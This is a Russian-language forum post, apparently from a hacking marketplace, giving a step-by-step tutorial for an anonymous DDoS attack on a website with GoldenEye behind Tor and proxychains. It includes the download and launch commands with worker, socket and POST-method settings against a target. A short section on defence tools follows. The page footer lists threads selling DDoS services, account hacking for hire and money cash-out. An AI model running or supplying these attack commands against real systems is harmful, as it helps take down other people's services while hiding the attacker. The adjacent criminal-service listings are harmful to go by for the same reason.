Отказ от обслуживания. Анонимная DDoS атака на веб-сайт с помощью GoldenEye и способы защиты

Admin

Original poster
Administrator
Сообщения
912
Реакции
730
Посетить сайт
DDOS.png
Кратко о «Дудосе»
Что это такое?

Википедия гласит:

DDoS (

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

Distributed Denial of Service, дословно «Распределенный отказ в обслуживании») —

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

на вычислительную систему с целью довести её до отказа, то есть создание таких условий, при которых добросовестные пользователи системы не смогут получить доступ к предоставляемым системным ресурсам (серверам), либо этот доступ будет затруднён.
Как работает данная атака и кто ею пользуется?

У каждого веб-сервера имеются ограничения по количеству запросов, которые веб-сервер может может обслуживать одновременно. Если количество запросов будет превышать допустимую норму — вполне возможно следующее:

  1. Замедление работы сервера (замедление обработки запросов)
  2. Полный отказ в обслуживании запросов
Чаще всего злоумышленники добиваются второго — полного отказа в обслуживании. Мотивы могут быть разными: начиная с защиты пользователей от мошеннических сайтов и заканчивая банальной скукой.

Но следует сказать, что пользуются данными атаками не только злоумышленники, но и «белые хакеры», т.е. пентестеры. Этой атакой этичные хакеры тестируют веб-сервера на мощность и способность обрабатывать большое количество запросов одновременно.

Работает DDoS так: злоумышленник создает сеть из «зомби-компьютеров» (на самом деле это не обязательно компьютеры: годными для данной атаки являются все устройства, способные отправлять запросы), и впоследствии использует эту сеть для проведения атаки.

Представим ситуацию: максимальный вес трафика, который может принимать сервер — 1 Гб. Злоумышленник пытается достичь или преодолеть этот барьер. Если получается — сервер сначала тормозит, а потом может и лечь.

Теперь самое интересное: как провести подобную атаку? Сразу предупредим — все, описанное и рассказанное ниже предоставлено лишь в ознакомительных целях. Чужие сервера ломать нельзя, за это могут быть проблемы законом. Мы тебя предупредили.
Необходимые инструменты
  1. EtherApe - графический монитор сети, который графически отображает сетевую активность. Хосты и ссылки меняются в размере с трафиком. Отображение цветовых протоколов.
  2. Service Tor - Tor позволяет клиентам и ретрансляторам предлагать скрытые услуги. То есть вы можете предложить веб-сервер, SSH-сервер и т.д. Не раскрывая свой IP-адрес своим пользователям.
  3. Proxychains - последняя версия Proxychains поддерживает SOCKS5, SOCKS4 и HTTP CONNECT. Прокси-цепи можно смешивать с разными типами прокси.
  4. GoldenEye - GoldenEye - приложение на python, предназначенное только для целей тестирования безопасности.
Как выполнить DDOS атаку на сайт?
1. Запустите etherape: etherape, появится всплывающее окно, которое графически отображает сетевую активность.

2. Запустите службу TOR:

service tor start

3. Загрузите Goldeneye


Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


wget

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.



4. После загрузки распакуйте его в папку

unzip GoldenEye-master.zip

5. Начать атаку

/GoldenEye-master# proxychains ./goldeneye.py

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.



b7979bfffbe78d61550fa.png

  • Добавьте значения для рабочих (-w), сокетов (-s) и метода (-m)
./goldeneye.py victim-website.com -w 100 -s 70 -m post

Если вы не остановите атаку, то в некоторых случаях она "взорвется". Чтобы остановить атаку просто нажмите CTRL+C.
Готово. Через какое-то время сервер будет тормозить, а затем, возможно, ляжет.

Общая защита от DDOS-атаки
  • Снижение скорости IP-соединения.
  • Используйте IDS, межсетевые экраны веб-приложений.
  • Tweak Connection на порог IP.
  • Защитите свои DNS-серверы.
  • Установите средства защиты. Убедитесь, что у вас установлены соответствующие средства защиты как для ваших сетей, так и для ваших приложений. Сюда входят такие ключевые инструменты, как брандмауэры, программное обеспечение для мониторинга сети и антивирусные программы, а также системы мониторинга угроз. С их помощью вы можете отслеживать базовый сетевой трафик и настраивать оповещения о необычном поведении.
  • Держите все в курсе. Все эти системы должны быть обновлены, чтобы гарантировать, что любые ошибки или проблемы исправлены. Обнаружение угроз как можно раньше - лучший способ предотвратить атаку DDoS-атак на важные сетевые инфраструктуры и повлиять на конечных пользователей.
Инструменты для предотвращения DDoS-атак
Есть несколько инструментов, которые я рекомендую для предотвращения и остановки DDoS-атак.

1. Security Event Manager
Для отслеживания поведения сети и маркировки угроз до того, как они станут чрезмерными, мне нравится SolarWinds Security Event Manager (SEM).

e046e9efad1df39cab843.png

Способность быстро реагировать на угрозу жизненно необходима, поскольку инициативы в области безопасности могут быстро стать бесполезными, если их развертывание займет слишком много времени. SEM включает в себя автоматические ответы, которые могут блокировать подозрительный IP или USB, отключать вредоносные устройства или отключать их привилегии, а также уничтожать приложения, которые ведут себя неожиданным образом. Это означает, что задержки при работе с чем-то вроде атаки DDoS сводятся к минимуму.

SEM также контролирует целостность файлов и USB, поэтому, если что-то выглядит не так, его можно остановить.

SolarWinds SEM предлагается бесплатно для тридцатидневной пробной версии. После этого вы можете посмотреть цены для каждого узла.

2. Cloudflare
4327ae5bb701daea85ff1.png

Cloudflare предлагает гибкий и масштабируемый инструмент, который объединяет несколько методов предотвращения DDoS в одном решении. Он предотвращает проникновение вредоносного и злонамеренного трафика в вашу сеть, а остальная часть сети остается функциональной и высокопроизводительной. Cloudflare использует базу данных репутации для отслеживания потенциальных угроз от злоумышленников.

Для предприятий Cloudflare стоит 200 долларов США в месяц, но на уровне предприятия вам необходимо связаться с Cloudflare для получения расценок.

3. Imperva
51a064bf9a360e03e6165.png

Средство защиты Imperva DDoS защищает всю сеть и защищает от атак с помощью обработки пакетов большой емкости. Он обеспечивает защиту от DDoS-атак как всегда, так и по требованию, в зависимости от того, что больше всего подходит вашему бизнесу, а также включает в себя автоматическое обновление панелей мониторинга, отображающих информацию о трафике атак. Основным недостатком инструмента Imperva является то, что он ограничен защитой от DDoS-атак.
 

Вложения

  • 1579953569920.png
    1579953569920.png
    53.8 КБ · Просмотры: 7
Последнее редактирование:
Название темы
Автор Заголовок Раздел Ответы Дата
adflak Публикация статей в 20 популярнейших ресурсах c Majestic от 20 Ищу работу. Предлагаю свои услуги. 2
vfxAlert Партнерка от vfxAlert - надежный способ монетизировать финансовый трафик! Все что не подошло по разделу 1
PONCHO [Белое] Плачу от 200р за 5 минут. Лёгкая верификация. Предоставляю работу. Ищу специалиста. 0
roxy_hide Куплю Гифт скуп сервис от Roxy Куплю/Обменяю 0
ONPROXY Продам ONPROXY.NET Приватные прокси по доступным ценам от 25 рублей за штуку. Промо-код: discount на 35% Дедики/VPN/соксы/ssh 0
andre5787 Арбитраж трафика от Василия Нашибы Способы заработка 0
Legendary_Fantomas Взлом ВКонтакте на заказ от Фантомаса Ищу работу. Предлагаю свои услуги. 3
adflak Трастовые статейные ссылки + Бонусы. Траст от 30 Ищу работу. Предлагаю свои услуги. 1
A Вконтакте от 3 рублей - Автореги, С голосами, Владельцы групп! Аккаунты/Админки/Документы 1
lizun [АКТУАЛЬНО][Легкий заработок для всех][от 500руб в день][Без ограничений по заработку] Способы заработка 4
ALFA16 Интересно CasT-Security.ru Приватная защита от DDoS-атак Ищу работу. Предлагаю свои услуги. 0
Степан Степаныч Уникальный авторский метод пожизненного дохода от 30$ в день Обучения, схемы, мануалы 6
alreadead Бесплатно до 100$ от Currency.com за 15 минут. Способы заработка 0
Khan В продажу выставлены смартфоны Google Pixel 4a с прошивкой от ФБР Новости в сети 0
NikitaKit $$$Продам брут на сайт,с которого можно вытянуть данные от крипто кошельков$$$ Продажа софта 5
V Продам Продажа дедиков от 80 рублей по странам Дедики/VPN/соксы/ssh 1
kirick7 Как защититься от фишинга? Вопросы и интересы 9
proxy-solutions.net Партнерская программа от компании Proxy-Solutions.net. Получайте процент от всех платежей на сайте! Предоставляю работу. Ищу специалиста. 0
It_Alanti Устали от рутинных действий? Автоматизируйте бизнес и освободите от 8 часов в неделю для важных задач. Ищу работу. Предлагаю свои услуги. 1
Zer0D4y Проверено СМС от именни любого сервиса/номера. Все что не подошло по разделу 8
jstatham Продам ОБНАЛ ГРЯЗИ, CALL CENTER от 15% НЕСЁМ ОТВЕТСТВЕННОСТЬ ФЗ-115 Карты/CC/Банки/Enroll 1
balzamos Кидок на 100 $ от JohnWoo Black list и Разборки 3
the_cutlet Продам Дизайн от Котлета Видеоролики Анимация Баннеры Оформление тем и многое другое Услуги дизайнеров/веб-разработчиков 1
K Проверено Различные услуги от сисадмина с большим стажем Сайты/Хостинг/Сервера 3
TriangleHost Продам Triangle.is — Виртуальные серверы от 49 рублей в месяц Сайты/Хостинг/Сервера 0
P Халява от банка Тинькофф Способы заработка 2
brigabos Как заряжать ноутбук от повербенк Свободное общение и флейм 2
Janipai Схема заработка от 5$ в день на своем аккаунте инстаграм Способы заработка 6
turbion0 Проверено DDOS от ↯Turbion Service↯ Спам / Флуд / Ддос 1
UnderD0g Интересно Виски > Сигареты > Reveser Engeneering проходим CrackMe от HTB Полезные статьи 3
is_name Продам Приватные Мобильные Прокси со сменой IP от 500р Дедики/VPN/соксы/ssh 0
Toony Продам ключ от винды за 10 рубасов Продажа софта 1
Khan Интересно Возможное отключение России от глобального интернета Новости в сети 1
S Куплю Скупаю USA дедики под крипт от 100$ Куплю/Обменяю 0
turbion0 Обналичка от ↯Turbion Service↯ Финансы - биллинги, банки, кошельки, логи 3
Р Интересно WWH от 16.11.20 Способы заработка 0
L Работа -оплата за цикл от 200-800 доларов. Предоставляю работу. Ищу специалиста. 0
Gumanoid [бесплатно] Ключ от Overwatch. Раздача (аккаунтов/ключей) 1
zheka424 Заработок на партнерке банков от 2 000 руб Способы заработка 1
alreadead Легкий заработок от 2к руб в день Предоставляю работу. Ищу специалиста. 1
T Дедик на 1 год от Alibaba Раздача dedic/ssh/proxy 0
A AkulaPay.com - Обменник с минимальной покупкой криптовалюты от 1000 рублей Обменники 1
A Как зарабатывать от 10$ на просмотре почты!!! Способы заработка 9
Gumanoid Интересно стикеры «Нямик» от Еда ВКонтакте Полезные статьи 0
H Как взламывают IP- и веб-камеры и как от этого защититься Уязвимости и взлом 0
Tzaz Заработок на бане instagram акканутов(от 300р в день) Обучения, схемы, мануалы 0
Multi-VPN Интересно VPN от multi-vpn.biz Раздача dedic/ssh/proxy 27
GLOV Продам Продажа аккаунтов криптобирж: от самых популярных до малоизвестных(Binance, blockchain.com, localbitcoins и тд)! Финансы - биллинги, банки, кошельки, логи 2
gloom59 Продам Голоса | Стикеры VK от 19 руб. Все что не подошло по разделу 0
V Продам Продажа дедиков серверов купить vps vds на windows от 60 рублей! магазин vps vds дедиков и виртуальных серверов vps vds https://vpskot.ru Дедики/VPN/соксы/ssh 1

Название темы